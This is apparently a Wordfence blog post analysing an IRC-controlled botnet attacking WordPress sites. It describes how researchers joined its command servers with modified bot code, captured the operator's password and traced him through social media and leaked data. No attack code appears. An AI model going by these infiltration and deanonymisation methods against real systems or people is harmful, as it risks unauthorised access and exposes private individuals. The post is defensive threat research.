While analyzing some of the attacks we see on the Wordfence Web Application Firewall, we discovered code that an attacker was trying to upload that was part of a botnet. In case you’re not in the information security space, a botnet is a network of ‘bot’ or ‘zombie’ machines that is controlled from a central command and control or C&C server.
In the case of this botnet, it was controlled via a chat service called IRC or Internet Relay Chat. IRC is a popular way of controlling botnets because you can have all the ‘bot’ or zombie machines connect to the chat server and join a channel to receive broadcasts. This allows the botnet owner to simply sign into the chat server and broadcast commands to all the zombies which they run at the same time.
The code below shows a typical hack attempt where the attacker is trying to inject their botnet code into a targeted WordPress site. Wordfence blocks this attack and any attack that includes this botnet code.
Once a WordPress site is compromised with this attack, the infected server connects to an IRC chat server, ready to receive commands and do the botnet owner’s bidding.
The owner might use those zombie WordPress sites to attack more sites. Or he might use them to launch a distributed denial of service or DDoS attack on someone, overwhelming them with traffic. He could also simply deface all the sites in his botnet with SEO spam.
The hashed password is shown next to LND-Bloodman’s username above. We’ve blurred the encoded command and control server IP address. The content length is over 25K so this is a reasonably long script.
The Wordfence team decided to analyze the botnet code and try to identify who was running the botnet.
Going After the Command and Control Servers
During our analysis of the malicious code, we found five IP addresses of IRC command and control servers (C&C servers) for this botnet. Two of them were down. Three were still up.
We created modified zombie code to connect to the C&C servers and do further analysis. Our code was designed to save all files it was commanded to download. It would also log all commands sent to it and not actually do anything malicious.
The botnet owner’s nickname/handle appears to be Bloodman.
One of the things we were hoping to get by doing this is Bloodman’s password that he uses to control his botnet. He had built his botnet zombie code so that whenever he sent a command to the zombies via the C&C server, it included a password.
The zombies would hash that password, compare the hash to what is stored in the code and if it matches, would know it’s Bloodman sending the command and would run the command.
The hash we found in the code, as you can see in the above image, is:
Googling this hash shows that the malware with this password has been seen before. A blogger saw an attack containing this hash in September last year.
The oldest Google result mentioning this hash is from December 2012 and is a request to crack the hash and turn it into the password which is still unsuccessful. This indicates with a high degree of certainty that Bloodman has been active and using this password since December 2012.
If one can reverse this hash, you can simply sign into any IRC server that Bloodman is using and have immediate control of his botnet.
We connected to all three of his C&C servers and after watching and waiting for about 48 hours we hit the jackpot. He signed in and sent a command to the botnet. We captured his password. The first part of it is:
We’ve intentionally starred out the rest of the password (which is long) to prevent anyone else from taking control of these botnets.
This allowed us to take control of his botnet if we wanted to. It turns out Bloodman also refers to himself as 1x33x7.
At this point we connected to one of the botnet servers:
We’ve blurred out any IP addresses or identifying information. The server is named to look like some kind of FBI honeypot. Considering it’s actively hacking WordPress sites, we’re guessing it’s a joke on the hacker’s part.
Joining the channel #1x33x7 where all the bots hang out shows us the following when we ask for a list of users:
There are 31 infected machines shown excluding the three users. And there is also LND-Bloodman hanging out in the channel.
The format of the nicknames shows some information about the compromised system including what web server software it’s running.
Running IRC’s ‘whois’ command on a few of the zombies shows that some of them are FreeBSD unix boxes. Others are running Windows Server 2012 or Windows 8 – both identify as “Windows NT 6.2 Build 9200.”
Running ‘whois’ on the two Bloodman accounts gave us two IP addresses and a possible email address with a first name.
At this point we have enough information to go ‘active’ and take control of the botnet and shut it down. The botnet has enough functionality for us to first delete any infected code and then kill the processes running on remote machines, thereby destroying the part of the botnet that is connected to this command and control server.
We chose not to shut down the botnet for two reasons:
Firstly the Computer Fraud and Abuse Act does not allow us to hack the hackers. So even though we had passively connected to this hacker’s command and control system, going active and changing the system could land us in some hot water with the FBI. We would rather observe and report because that is all the law allows unless you work for the military or a military agency in the United States.
Secondly, we were concerned that we may not have all the information and we may actually do harm by trying to disinfect remote machines.
We don’t think that shutting down a single C&C server or even all three C&C servers and their respective bots would do much good. Bloodman would simply regroup and reinfect new sites with new C&C servers.
Attribution – Who is doing this?
To try to determine who controls this botnet, we started with both usernames that appear in the source code: Bloodman and 1x33x7. One of those usernames pointed us to a Twitter account. The Twitter account contains a german slogan “I am root” and various images of what is probably the botnet owner’s face.
The Twitter account links to a YouNow profile which is a live video broadcasting service – it uses the same username.
The YouNow profile linked to a YouTube account that uses the second username, which contains plenty of identifying information and a video of the botnet controller bragging about his botnet. He speaks German, likes to play with fireworks and we know what car he drives and have images of various German roads.
In addition to the open source intelligence above, we mined public data leaks and found a user profile on a hacker website that includes one of the usernames and the IP address the user last signed in from. That IP address is in Germany and belongs to Deutsche Telekom. Providing this to the authorities would probably reveal his full identity from ISP logs.
This is a small botnet with under 100 infected machines when you combine all the C&C servers together. This individual is launching under 2000 attacks per week. While they are inconvenient and consume resources, they are all blocked by the Wordfence Firewall.
We are working with net block owners to let them know about machines, particularly C&C servers that are on their network and are likely compromised.
We think that discussing the tactics, techniques and procedures of attackers, both small and large helps us all better understand what we are protecting our WordPress sites against and how to do a better job.